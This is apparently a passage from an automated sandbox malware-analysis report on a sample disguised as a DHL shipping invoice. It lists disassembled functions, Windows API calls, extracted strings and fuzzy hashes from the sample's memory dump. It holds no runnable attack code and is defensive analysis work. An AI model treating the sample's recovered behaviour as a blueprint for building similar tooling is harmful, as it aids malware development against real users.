                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4218492932-0
                                                                                                                                                                                                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                                      • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                                      • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                                                                                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintfwcscat
                                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                                      • API String ID: 384018552-4153097237
                                                                                                                                                                                                                                      • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                                                                                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                                      • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                                                                                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                                      • String ID: 6$\
                                                                                                                                                                                                                                      • API String ID: 404372293-1284684873
                                                                                                                                                                                                                                      • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                                                                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1331804452-0
                                                                                                                                                                                                                                      • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                                                                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                                      • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                                      • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                                      • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                                      • API String ID: 2521778956-791839006
                                                                                                                                                                                                                                      • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                                      • API String ID: 999028693-502967061
                                                                                                                                                                                                                                      • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2350177629-0
                                                                                                                                                                                                                                      • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                                      • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                                      • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                                                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00409042
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 265355444-0
                                                                                                                                                                                                                                      • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                                                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
